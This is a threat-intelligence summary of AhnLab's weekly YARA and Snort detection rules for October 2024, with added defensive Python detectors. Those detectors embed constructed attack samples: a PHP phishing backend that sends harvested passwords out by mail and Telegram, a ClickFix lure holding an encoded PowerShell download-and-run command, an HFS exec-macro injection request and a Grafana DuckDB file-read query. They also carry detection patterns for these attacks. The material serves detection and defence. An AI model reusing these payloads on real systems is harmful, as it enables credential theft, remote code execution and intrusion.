Full Report
The following is the information on YARA and Snort rules (week 5, October 2024) collected and shared by the AhnLab TIP service.

5 YARA Rules

| Detection name | Description | Source |
|---|---|---|
| PK_EDD_prncpal | Phishing Kit impersonating Employment Development Department California (EDD) | https://github.com/t4d/PhishingKit-Yara-Rules |
| PK_Eika_oio | Phishing Kit impersonating Eika Bank | https://github.com/t4d/PhishingKit-Yara-Rules |
| PK_Huntington_code0t17 | Phishing Kit impersonating Huntington bank | https://github.com/t4d/PhishingKit-Yara-Rules |
| PK_LeBonCoin_2022 | Phishing […] | (truncated in the excerpt) |

The post "Weekly Detection Rule (YARA and Snort) Information – Week 5, October 2024" first appeared on ASEC.
Analysis Summary
This summary synthesizes information regarding specific phishing kits detected via YARA rules and various vulnerabilities/malware families detected via Snort rules, as observed in week 5 of October 2024 by AhnLab TIP.
# Tool/Technique: Phishing Kits (Generic Collection)
## Overview
A collection of YARA rules designed to detect various phishing kits impersonating different entities, mostly financial institutions or major services (e.g., EDD California, Eika Bank, Huntington Bank, Le Bon Coin, Netflix). These kits are used by threat actors to steal credentials or sensitive information.
## Technical Details
- Type: Tool (Phishing Kit Components)
- Platform: Web servers hosting the kit (victims reach it through a browser)
- Capabilities: Deception, credential harvesting, imitation of legitimate login/information pages.
- First Seen: Not specified (Rules are for current detections in October 2024)
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.002 - Phishing: Spearphishing Link (victims are sent a link to the hosted kit)
- T1608.005 - Stage Capabilities: Link Target (the kit is the landing page the actor stages before the campaign)
*Note: The YARA rules match the kit's files on disk; the ATT&CK entries describe the campaign that deploys them. Spearphishing Attachment (T1566.001) does not apply to a hosted kit unless the lure is an HTML attachment that loads it.*
## Functionality
### Core Capabilities
- Impersonation of trusted organizations (Employment Development Department California, banks, Netflix).
- Collection of user input from deceptive web forms.
### Advanced Features
- Not detailed in the rule descriptions. Beyond the lookalike pages, phishing kits commonly ship a backend (usually PHP) that receives the submitted form data and forwards it to the operator by e-mail or through a messaging-bot API, plus an anti-analysis layer (blocklists of security-vendor IP ranges and user agents) that serves harmless content to scanners. These backend files are often what the YARA rules key on, because the visible HTML is copied from the impersonated site and changes little between kits.
## Indicators of Compromise
- File Hashes: N/A (Rules are based on file content/patterns)
- File Names: N/A (Specific file names are not listed in the summary table)
- Registry Keys: N/A
- Network Indicators: N/A (These rules target the deployed kit files)
- Behavioral Indicators: Kit files on a web server, or in a recovered kit archive, matching the listed YARA rules.
## Associated Threat Actors
- Generic Cybercriminals/Phishing Operators
## Detection Methods
- Signature-based detection (YARA rules are provided for detection).
## Mitigation Strategies
- User training on recognizing phishing attempts.
- Implementing multi-factor authentication (MFA).
- Content filtering and network reputation checks to block known phishing domains.
## Related Tools/Techniques
- Other password harvesting scripts or web skimmers.
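The backend described above is where a kit's value to the operator lives, and it is the part an analyst needs to read first when a YARA hit turns up a kit archive. The following triage script is an added example written for this summary, not code from the AhnLab post or from the t4d/PhishingKit-Yara-Rules project; it walks a kit directory and reports the exfiltration channels it finds. The two-file sample kit it builds, including the addresses and the bot token, is constructed for illustration.

```python
"""Triage a phishing kit directory for the channel that receives harvested data.

Added example for this summary; it is not code from the AhnLab post or from the
t4d/PhishingKit-Yara-Rules project. The sample kit it builds is constructed
here for illustration (file names, addresses and token are made up); the
patterns it looks for (PHP mail(), the Telegram bot API, harvested credential
fields) are the backend features a phishing-kit signature commonly keys on.
"""
import os
import re
import tempfile

# Label -> regex. Each regex is run over every text file in the kit.
EXFIL_PATTERNS = {
    "php_mail_call": re.compile(r"\bmail\s*\("),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+"),
    "harvested_post_field": re.compile(
        r"\$_POST\[\s*['\"](?:pass(?:word)?|pin|ssn|card(?:number)?|cvv)['\"]\s*\]", re.I),
    "hardcoded_email": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
}

TEXT_EXTENSIONS = {".php", ".html", ".htm", ".js", ".txt", ".json"}


def redact(label, value):
    """Keep findings shareable: drop the secret half of a Telegram bot token."""
    if label == "telegram_bot_api":
        return re.sub(r":[A-Za-z0-9_-]+$", ":<redacted>", value)
    return value


def triage_kit(root):
    """Return (relative path, label, redacted match) for every hit under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if os.path.splitext(name)[1].lower() not in TEXT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            for label, pattern in EXFIL_PATTERNS.items():
                for match in pattern.finditer(text):
                    findings.append((rel, label, redact(label, match.group(0))))
    return findings


def summarize(findings):
    """Count hits per label: the quick answer to 'where do the credentials go'."""
    counts = {}
    for _, label, _ in findings:
        counts[label] = counts.get(label, 0) + 1
    return counts


def build_sample_kit():
    """Write a constructed two-file kit to a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="kit_")
    index_html = """<form method="post" action="login.php">
<input name="email"><input name="password" type="password"><button>Sign in</button>
</form>"""
    login_php = """<?php
$email = $_POST['email'];
$password = $_POST['password'];
$msg = "E: $email | P: $password | IP: " . $_SERVER['REMOTE_ADDR'];
mail("results.drop@example.net", "New login", $msg);
$tg = "https://api.telegram.org/bot123456789:AAExampleTokenNotReal/sendMessage";
@file_get_contents($tg . "?chat_id=0&text=" . urlencode($msg));
header("Location: https://www.example.com/");
"""
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write(index_html)
    with open(os.path.join(root, "login.php"), "w") as fh:
        fh.write(login_php)
    return root


if __name__ == "__main__":
    kit = build_sample_kit()
    for rel, label, value in triage_kit(kit):
        print(f"{rel}: {label}: {value}")
    print(summarize(triage_kit(kit)))
```

Run it as a script to see the findings for the sample kit. The patterns are deliberately narrow; extend them with whatever the recovered kit actually uses (Discord webhooks, SMTP credentials, a results file written to disk) and treat the hardcoded address and bot token as the pivots for notification and takedown.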
---
# Tool/Technique: ET TROJAN ClickFix Fake Browser Update Page Inbound M2
## Overview
A Snort rule that detects a ClickFix lure page being delivered to a client (inbound). ClickFix pages pose as a browser update or an error/verification prompt and tell the user to "fix" the problem by pressing Win+R (or opening a terminal) and pasting a command that the page has already placed on the clipboard; the pasted command, usually PowerShell or mshta, fetches and runs the payload. The browser itself downloads no file, which is what lets the technique slip past download-focused controls. "M2" marks the second signature variant for this page family.
## Technical Details
- Type: Social-engineering delivery (fake update / ClickFix lure)
- Platform: Network Communication (HTTP response to the victim's browser)
- Capabilities: Tricks the user into running a loader command themselves; the page is the delivery vector, not the payload.
- First Seen: Unknown (Rule published in week 5, October 2024 update)
## MITRE ATT&CK Mapping
- T1204 - User Execution (the victim runs the pasted command)
- T1059.001 - Command and Scripting Interpreter: PowerShell (the usual pasted command)
- T1071.001 - Application Layer Protocol: Web Protocols (lure page and payload are retrieved over HTTP/HTTPS)
## Functionality
### Core Capabilities
- Matching the lure page's HTML as it is returned to the client, so the alert fires when the user is shown the instructions, before anything has been executed.
### Advanced Features
- Specific to one variant of the page template. ClickFix templates are reused and lightly modified across campaigns, so expect further "M" variants and do not read a miss on this rule as evidence of absence.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: HTTP response body matching the rule's content pattern (the M2 page template).
- Behavioral Indicators: On the endpoint, explorer.exe (the Run dialog) spawning powershell.exe, mshta.exe or cmd.exe with a command line that downloads from the Internet shortly after a browsing session; this is the higher-confidence signal and should be correlated with the network alert.
## Associated Threat Actors
- Unknown (Associated with ClickFix scams)
## Detection Methods
- Signature-based detection (Snort rule).
## Mitigation Strategies
- User education with one concrete rule: no legitimate update or verification step ever asks you to paste a command into the Run dialog or a terminal.
- Endpoint controls: log or restrict PowerShell and mshta launched from explorer.exe, and consider the Group Policy that removes the Run dialog for standard users where that does not break workflows.
- Network intrusion detection/prevention systems (NIDS/NIPS) using these rules.
## Related Tools/Techniques
- Various malvertising delivery chains.
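The page-content characteristics the rule relies on can be checked outside Snort as well, for instance over proxy-captured responses or a sandbox's DOM dump. The scorer below is an added example written for this summary, not the Emerging Threats rule and not code from the AhnLab post; it scores an HTML body on the signals a ClickFix lure combines, and includes a constructed docs page with a copy-this-command button to show why a clipboard write alone is not enough. Weights, threshold and both pages are this example's own choices.

```python
"""Score an HTML response body for ClickFix lure characteristics.

Added example for this summary; it is not the Emerging Threats rule and not
code from the AhnLab post. It keys on what the page family has in common: a
page that writes a command to the clipboard and tells the reader to paste it
into the Run dialog or a shell. Both pages below are constructed; the weights
and threshold are this example's own choices, not values from any rule.
"""
import html
import re
from urllib.parse import unquote

# (label, pattern, weight); every pattern is searched once in the decoded page.
SIGNALS = [
    ("clipboard_write",
     re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I), 2),
    ("run_dialog_instruction",
     re.compile(r"\bwin(?:dows)?\s*(?:key)?\s*\+\s*r\b|\brun\s+dialog", re.I), 3),
    ("paste_and_enter",
     re.compile(r"(?:ctrl\s*\+\s*v|\bpaste)[^.]{0,80}\b(?:enter|ok)\b", re.I), 2),
    ("shell_command",
     re.compile(r"\b(?:powershell|mshta|cmd\s*/c|msiexec|curl\s+-)", re.I), 3),
    ("hidden_or_encoded",
     re.compile(r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b|\biex\b|invoke-expression", re.I), 2),
    ("update_or_verify_lure",
     re.compile(r"update\s+(?:your\s+)?browser|browser\s+update|verify\s+you\s+are\s+human|fix\s+(?:it|the\s+problem)", re.I), 1),
]
THRESHOLD = 7
# A docs page with a "copy this curl command" button scores on three signals
# too; require one of the signals that legitimate pages do not produce.
STRONG = {"run_dialog_instruction", "hidden_or_encoded"}


def decode_page(body):
    """Undo the cheap obfuscation lures use: HTML entities and percent-encoding."""
    return unquote(html.unescape(body))


def score_page(body):
    """Return the score, the signals that fired, and the verdict for one page."""
    text = decode_page(body)
    hits = [label for label, pattern, _ in SIGNALS if pattern.search(text)]
    score = sum(weight for label, _, weight in SIGNALS if label in hits)
    return {"score": score, "hits": hits,
            "clickfix": score >= THRESHOLD and bool(STRONG & set(hits))}


# Constructed lure: the command is stored percent-encoded and decoded on click.
CLICKFIX_PAGE = """<html><body>
<h1>Update your browser</h1>
<p>To continue, press <b>Win + R</b>, press <b>CTRL+V</b> and then hit <b>Enter</b>.</p>
<button onclick="navigator.clipboard.writeText(decodeURIComponent(
'powershell%20-w%20hidden%20-c%20%22iex%20(iwr%20http%3A%2F%2Fexample.invalid%2Fx)%22'))">Fix it</button>
</body></html>"""

# Constructed benign page: the classic false positive for clipboard-based rules.
BENIGN_PAGE = """<html><body>
<h1>Install the CLI</h1>
<p>Copy the command below and paste it into your terminal, then press Enter.</p>
<pre id="cmd">curl -fsSL https://example.invalid/install.sh | sh</pre>
<button onclick="navigator.clipboard.writeText(document.getElementById('cmd').textContent)">Copy</button>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("lure", CLICKFIX_PAGE), ("docs", BENIGN_PAGE)):
        print(name, score_page(page))
```

The decoding step matters more than the regexes: lure pages routinely keep the command percent-encoded or entity-encoded in the markup and only decode it in the click handler, so matching the raw bytes misses the PowerShell string entirely.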
---
# Tool/Technique: Grafana Post-Authentication DuckDB SQL Injection (CVE-2024-9264)
## Overview
A Snort rule detecting exploitation attempts against CVE-2024-9264, a SQL injection in Grafana's experimental SQL Expressions feature. The feature passes user-supplied SQL to an embedded DuckDB without adequate sanitisation, so an authenticated user (Viewer permission is enough) can run arbitrary DuckDB SQL, including DuckDB's file-reading functions, to read files from the Grafana host and, where the duckdb binary is present on Grafana's PATH, execute code. Without the duckdb binary the flaw is not exploitable, which is why removing the binary was published as a temporary mitigation.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Grafana Web Application (Server Side)
- Capabilities: Reading any file the Grafana service account can read (configuration and data-source secrets included) and, with duckdb present, running commands on the Grafana host.
- First Seen: Unknown (Rule published week 5, October 2024)
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application (on Internet-exposed instances)
- T1078 - Valid Accounts (the flaw is post-authentication; a low-privilege Grafana login is required)
- T1005 - Data from Local System (file read through DuckDB)
- T1059 - Command and Scripting Interpreter (when the duckdb binary enables code execution)
## Functionality
### Core Capabilities
- Detecting HTTP POST requests to Grafana's query API whose SQL Expression payload carries the injection.
### Advanced Features
- Specific to CVE-2024-9264; only Grafana 11 builds that include the SQL Expressions feature are affected.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: HTTP POST requests to the Grafana query API whose SQL expression calls DuckDB file-access functions or otherwise steps outside an ordinary aggregation query.
- Behavioral Indicators: The Grafana process spawning duckdb, or reading files unrelated to its own data directory, shortly after such a request.
## Associated Threat Actors
- Opportunistic actors scanning for exposed Grafana. Since valid credentials are required, instances with default, shared or leaked logins are the realistic targets.
## Detection Methods
- Signature-based detection (Snort rule based on specific request details).
## Mitigation Strategies
- Upgrading Grafana to a release that fixes CVE-2024-9264.
- Until upgraded, removing the duckdb binary from Grafana's PATH, which closes the exploitable path entirely.
- Reviewing who holds Grafana accounts: every Viewer can reach a post-auth flaw, so remove shared and stale logins and require SSO with MFA.
- Web Application Firewalls (WAFs) tuned for SQL injection patterns add some coverage, but they cannot reliably tell a legitimate SQL expression from a hostile one.
## Related Tools/Techniques
- Other application-layer injection techniques against data sources.
---
# Tool/Technique: Apache ShardingSphere ElasticJob-UI Privilege Escalation (CVE-2022-22733)
## Overview
Two Snort rules targeting exploitation attempts against Apache ShardingSphere ElasticJob-UI related to CVE-2022-22733, identifying both the attempt and the successful execution of a privilege escalation vulnerability.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Apache ShardingSphere ElasticJob-UI Server
- Capabilities: Attempting to escalate privileges within the ElasticJob-UI component.
- First Seen: Known vulnerability from 2022, rules updated October 2024.
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application (where the console is reachable from untrusted networks)
- T1068 - Exploitation for Privilege Escalation (guest-level access elevated to administrator within the application)
- T1078 - Valid Accounts (the elevated access is then used like a legitimate administrator's)
## Functionality
### Core Capabilities
- Detecting the exploit request (the "Attempt" rule) and the server response that shows it worked (the "Successful Attempt" rule).
### Advanced Features
- The flaw lets an attacker holding only a guest account of ElasticJob-UI obtain administrator-level access within the application. A hit on the "Successful Attempt" rule should therefore be handled as a confirmed takeover of the console, not as scanning noise.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic patterns matching the exploit vectors for CVE-2022-22733.
- Behavioral Indicators: Successful session creation or state change indicating privilege escalation achievement.
## Associated Threat Actors
- Actors targeting vulnerable Java applications and infrastructure management tools.
## Detection Methods
- Signature-based detection (Two Snort rules for attempt and success).
## Mitigation Strategies
- Applying patches released by the Apache ShardingSphere project to fix CVE-2022-22733.
- Restricting network access to management interfaces like ElasticJob-UI.
## Related Tools/Techniques
- Other privilege escalation techniques targeting Java applications.
---
# Tool/Technique: Zyxel USG/Zywall Authentication Bypass Attempt (CVE-2022-0342)
## Overview
A Snort rule detecting network attempts to exploit the authentication bypass vulnerability (CVE-2022-0342) present in Zyxel USG and ZyWALL products.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Zyxel USG/ZyWALL firmware; Zyxel's advisory also lists the USG FLEX, ATP, VPN and NSG lines, which share the affected web-management code.
- Capabilities: Bypassing web-interface authentication to reach administrative functions on the device.
- First Seen: Known vulnerability from 2022, rules updated October 2024.
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application (the management interface is the exposed application)
- T1098 - Account Manipulation (typical follow-on: adding an administrator or VPN user for persistent access)
*Note: No credential theft is involved; the bypass yields administrative access directly.*
## Functionality
### Core Capabilities
- Identifying network traffic patterns designed to trigger the authentication flaw in Zyxel management interfaces.
### Advanced Features
- Exploits a specific flaw allowing unauthenticated access to administrative functions.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Requests to the device's web-management CGI that match the exploit pattern in the rule.
- Behavioral Indicators: Traffic matching known exploit signatures for CVE-2022-0342.
## Associated Threat Actors
- Actors targeting exposed network appliances for initial access or botnet recruitment.
## Detection Methods
- Signature-based detection (Snort rule).
## Mitigation Strategies
- Immediately upgrading Zyxel firmware to versions mitigating CVE-2022-0342.
- Isolating management interfaces from the public internet where possible.
## Related Tools/Techniques
- Authentication bypasses targeting other firewall/VPN appliances.
---
# Tool/Technique: Rejetto HTTP File Server Template Injection (CVE-2024-23692)
## Overview
A Snort rule monitoring for exploitation attempts against Rejetto HTTP File Server (HFS) 2.x via CVE-2024-23692, a template injection that needs no authentication. HFS 2.x has its own macro language, written as {.macro|argument.} inside page templates; attacker-controlled input that reaches template processing is evaluated as macros, and the exec macro runs an operating-system command. The vulnerable 2.x line (up to and including 2.3m) is discontinued and has no patch.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Rejetto HTTP File Server (HFS)
- Capabilities: Executing arbitrary code or commands via template processing errors.
- First Seen: Unknown (Rule published week 5, October 2024)
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (HFS 2.x runs only on Windows, so the injected command lands in cmd.exe or PowerShell)
## Functionality
### Core Capabilities
- Detecting HTTP requests containing signatures indicative of template injection payload delivery.
### Advanced Features
- Enables remote code execution via template mechanism misuse.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: HTTP requests to an HFS server carrying HFS macro syntax such as {.exec| in a parameter (the rule's exact content is not reproduced in the post).
- Behavioral Indicators: hfs.exe spawning cmd.exe, powershell.exe or other child processes; a file server has no reason to do so.
## Associated Threat Actors
- General attackers scanning for vulnerable web services.
## Detection Methods
- Signature-based detection (Snort rule).
## Mitigation Strategies
- Rejetto has discontinued HFS 2.x and it will not be fixed: migrate to HFS 3 (a separate codebase not affected by this CVE) or take 2.x instances offline.
- Never expose HFS 2.x to the Internet; if it must stay up temporarily, restrict access to trusted addresses.
## Related Tools/Techniques
- Other server-side template injection (SSTI) vulnerabilities.
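Both the Grafana rule above and this HFS rule are content matches on an HTTP request, and the same normalisation question applies to each: the match must run on the decoded URI and body, or a percent-encoded payload slips past. The following is an added example written for this summary, not the Emerging Threats signatures (the post does not reproduce their content): it parses a raw request, normalises the URI the way an IDS http_uri buffer does, and applies two approximated rules, one keyed on HFS 2.x macro syntax and one on DuckDB file-reading functions in a Grafana SQL expression. The Grafana endpoint /api/ds/query and the expression JSON layout are assumptions about Grafana's query API, and all three requests are constructed.

```python
"""Normalise an HTTP request the way an IDS does, then apply content rules.

Added example for this summary. The two rules are not the Emerging Threats
signatures for CVE-2024-23692 or CVE-2024-9264 (the post does not reproduce
their content); they are approximations built from the public facts: HFS 2.x
evaluates {.exec|...} macros, and the Grafana flaw is a SQL expression handed
to DuckDB, whose file-reading functions are the obvious abuse. The Grafana
endpoint /api/ds/query and the expression JSON layout are assumptions about
Grafana's query API, and all requests below are constructed.
"""
import json
import re
from urllib.parse import unquote


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, normalised URI, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Snort matches http_uri against a normalised buffer (percent-decoded,
    # among other things); a rule that only looked at the raw request line
    # would be evaded by writing { as %7B. Do the same here.
    return {"method": method, "raw_uri": target, "uri": unquote(target),
            "headers": headers, "body": body}


RULES = [
    {"name": "HFS 2.x macro injection in URI (CVE-2024-23692 style)",
     "method": "GET",
     "uri_regex": re.compile(r"\{\.\s*exec\s*\|", re.I)},
    {"name": "Grafana SQL expression calling a DuckDB file reader (CVE-2024-9264 style)",
     "method": "POST",
     "uri_prefix": "/api/ds/query",
     "body_regex": re.compile(r"\bread_(?:csv(?:_auto)?|text|blob|json(?:_auto)?)\s*\(", re.I)},
]


def match_rules(req):
    """Return the names of every rule whose conditions all hold for the request."""
    names = []
    for rule in RULES:
        if rule["method"] != req["method"]:
            continue
        if "uri_prefix" in rule and not req["uri"].startswith(rule["uri_prefix"]):
            continue
        if "uri_regex" in rule and not rule["uri_regex"].search(req["uri"]):
            continue
        if "body_regex" in rule and not rule["body_regex"].search(req["body"]):
            continue
        names.append(rule["name"])
    return names


def scan(raw):
    return match_rules(parse_request(raw))


# Constructed: the macro is percent-encoded, so a raw-bytes match for "{.exec|" fails.
HFS_REQUEST = ("GET /?search=%7B.exec%7Cnotepad.%7D HTTP/1.1\r\n"
               "Host: hfs.example.invalid\r\n\r\n")


def grafana_request(expression):
    """Constructed query-API call carrying one SQL expression (layout assumed)."""
    body = json.dumps({"queries": [{"refId": "A", "type": "sql",
                                    "datasource": {"type": "__expr__", "uid": "__expr__"},
                                    "expression": expression}]})
    return ("POST /api/ds/query HTTP/1.1\r\nHost: grafana.example.invalid\r\n"
            "Content-Type: application/json\r\nCookie: grafana_session=<redacted>\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


# DuckDB's read_blob() is a file reader; the path is illustrative.
GRAFANA_FILE_READ = grafana_request("SELECT content FROM read_blob('/etc/hostname')")
GRAFANA_NORMAL = grafana_request("SELECT time, avg(value) FROM A GROUP BY time")

if __name__ == "__main__":
    for label, raw in (("hfs", HFS_REQUEST), ("grafana-read", GRAFANA_FILE_READ),
                       ("grafana-normal", GRAFANA_NORMAL)):
        print(label, scan(raw))
```

The Grafana rule illustrates the limit of network signatures for post-authentication flaws: the request is indistinguishable from a legitimate SQL expression except for what the SQL does, so a signature can only enumerate known-bad functions, and the account review and the duckdb-binary mitigation listed above carry more weight than the rule.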
---
# Tool/Technique: Splunk Enterprise < 9.1.2 XML Injection (CVE-2023-46214)
## Overview
A Snort rule targeting activity associated with CVE-2023-46214 in Splunk Enterprise. Despite the "XML Injection" label in the rule name, the underlying flaw is unsafe handling of user-supplied Extensible Stylesheet Language Transformations (XSLT): Splunk Enterprise versions below 9.0.7 and 9.1.2 did not sanitise XSLT that users supply, so an authenticated user could upload a malicious stylesheet and have Splunk apply it, resulting in remote code execution on the Splunk host. SSRF is not the impact described in the vendor advisory.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Splunk Enterprise (Web Interface)
- Capabilities: Remote code execution on the Splunk server in the context of the Splunk service account, which typically holds credentials for every data source and forwarder the deployment uses.
- First Seen: Known vulnerability from 2023, rules updated October 2024.
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1078 - Valid Accounts (a Splunk login is required; a low-privilege one suffices)
- T1059 - Command and Scripting Interpreter (commands run from the malicious stylesheet)
## Functionality
### Core Capabilities
- Identifying requests to Splunk Web that carry stylesheet (xsl:stylesheet) content toward the upload and transformation paths the flaw abuses.
### Advanced Features
- Exploiting the XSLT processor's ability to call out of the stylesheet, not XML deserialization; the attacker controls the stylesheet and Splunk applies it.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: HTTP requests to Splunk Web containing XSLT stylesheet markup in an upload.
- Behavioral Indicators: splunkd or Splunk Web processes spawning shells or unexpected child processes after an XSLT upload.
## Associated Threat Actors
- Actors targeting enterprise monitoring and logging infrastructure.
## Detection Methods
- Signature-based detection (Snort rule).
## Mitigation Strategies
- Upgrading Splunk Enterprise to 9.0.7, 9.1.2 or later; both the 9.0.x and 9.1.x lines were affected.
- Network segmentation to restrict unauthorized internal access to Splunk.
## Related Tools/Techniques
- Other XML processing weaknesses in enterprise software.
---
# Tool/Technique: ZharkBOT CnC Activity (GET M1 & M2)
## Overview
Two Snort rules (M1 and M2) designed to detect Command and Control (C2) beaconing activity utilizing the GET method associated with the ZharkBOT malware family.
## Technical Details
- Type: Malware (ZharkBOT) C2 Communication
- Platform: Network Communication (HTTP GET requests)
- Capabilities: Maintaining persistent communication channel between infected hosts and the attacker's infrastructure.
- First Seen: Unknown (Rules active as of October 2024 updates)
## MITRE ATT&CK Mapping
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP C2 beaconing)
- T1041 - Exfiltration Over C2 Channel (If data is sent via these channels)
## Functionality
### Core Capabilities
- Detecting specific patterns, possibly URI structures or headers, used by ZharkBOT for beaconing.
### Advanced Features
- Separated rules (M1/M2) suggest multiple C2 patterns or infection stages are being monitored.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic matching the specific C2 signatures utilized by ZharkBOT, likely involving specific URLs or user-agent strings.
- Behavioral Indicators: Regular, machine-generated HTTP GET requests.
## Associated Threat Actors
- Not specified in the source; no attribution for ZharkBOT is given in this summary.
## Detection Methods
- Signature-based network detection (Snort rules ET TROJAN ZharkBOT CnC Activity).
## Mitigation Strategies
- Blocking known ZharkBOT C2 infrastructure at the perimeter.
- Identifying and eradicating ZharkBOT infections on endpoints.
## Related Tools/Techniques
- Other commodity bots and loaders that beacon with plain HTTP GET requests.
---
# Tool/Technique: Mints.Loader CnC Activity (GET)
## Overview
A Snort rule detecting Command and Control (C2) beaconing traffic, utilizing the GET method, associated with the Mints.Loader malware.
## Technical Details
- Type: Malware (Mints.Loader) C2 Communication
- Platform: Network Communication (HTTP GET requests)
- Capabilities: Establishing C2 communication for instructions or data transfer.
- First Seen: Unknown (Rule published week 5, October 2024 update)
## MITRE ATT&CK Mapping
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP C2 beaconing)
## Functionality
### Core Capabilities
- Monitoring network traffic for Mints.Loader's characteristic C2 beacon signatures communicated over HTTP GET.
### Advanced Features
- Not described in the source. As a loader, the GET beacon is most likely the check-in that pulls tasking or the next-stage payload.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific URI patterns, headers, or hostnames associated with Mints.Loader C2 servers.
- Behavioral Indicators: Periodic, automated HTTP GET requests.
## Associated Threat Actors
- Unknown actors distributing or utilizing Mints.Loader.
## Detection Methods
- Signature-based network detection (Snort rule ET TROJAN Mints.Loader CnC Activity).
## Mitigation Strategies
- Blocking observed Mints.Loader C2 infrastructure.
- Ensuring endpoint security software can detect and remove Mints.Loader binaries.
## Related Tools/Techniques
- Other loader malware utilizing basic HTTP beaconing.
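Signature rules like the ZharkBOT and Mints.Loader ones above catch known URIs and headers; the behavioural indicator both sections list, regular machine-generated GET requests, can be checked for any destination. The following is an added example written for this summary, not code from the AhnLab post or from either rule: it groups proxy-log GETs by source, host and path, measures how regular the intervals are, and flags flows with many requests and little jitter, with an allowlist for the legitimate periodic callers that would otherwise dominate the output. Log lines, thresholds and the allowlist are constructed for illustration.

```python
"""Flag periodic HTTP GET traffic (beaconing) in a proxy log.

Added example for this summary; it is not from the AhnLab post and is not the
ZharkBOT or Mints.Loader Snort rules. Those match known URIs and headers; this
looks for the behaviour the summary lists, regular machine-generated GETs, so
it also surfaces C2 hosts no signature covers yet. The log lines are
constructed, in a simplified "epoch src method url" layout rather than any
product's real format; thresholds and the allowlist are this example's own.
"""
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlsplit

MIN_REQUESTS = 6       # below this, interval statistics say little
MAX_JITTER = 0.10      # stdev/mean of the gaps; a fixed-sleep beacon sits well below
ALLOWLIST = {"updates.example.net"}   # known periodic callers (patch checks, telemetry)


def parse_line(line):
    ts, src, method, url = line.split()
    return float(ts), src, method, url


def find_beacons(lines, allowlist=ALLOWLIST):
    """Return (src, host, path, count, mean_gap, jitter) for each beacon-like flow."""
    stamps = defaultdict(list)
    for line in lines:
        ts, src, method, url = parse_line(line)
        if method != "GET":
            continue
        parts = urlsplit(url)
        # Key on path only: C2 query strings often carry a changing bot id or nonce.
        stamps[(src, parts.hostname, parts.path)].append(ts)
    hits = []
    for (src, host, path), times in stamps.items():
        if len(times) < MIN_REQUESTS or host in allowlist:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg > 0 else float("inf")
        if jitter <= MAX_JITTER:
            hits.append((src, host, path, len(times), round(avg, 1), round(jitter, 3)))
    return sorted(hits)


def build_sample_log():
    """Constructed log: one beacon, one human browsing burst, one allowlisted checker."""
    base = 1_730_000_000
    lines = []
    for off in (0, 61, 119, 181, 240, 302, 359, 421):        # ~60 s sleep, small jitter
        lines.append(f"{base + off} 10.0.0.5 GET http://c2.example.invalid/gate.php?id=7")
    for off in (5, 9, 150, 152, 410):                        # irregular, and too few
        lines.append(f"{base + off} 10.0.0.5 GET http://www.example.com/news")
    for off in range(0, 2100, 300):                          # exact 300 s, allowlisted
        lines.append(f"{base + off} 10.0.0.7 GET https://updates.example.net/check")
    return lines


if __name__ == "__main__":
    for hit in find_beacons(build_sample_log()):
        print(hit)
```

The jitter statistic (standard deviation of the gaps divided by their mean) is what separates a sleep-and-poll loop from a person. Implants that add random jitter push it up, so treat MAX_JITTER as a tuning knob and corroborate with the request count and the destination's reputation rather than relying on the ratio alone; run the allowlist empty once per environment to see which internal periodic callers need adding.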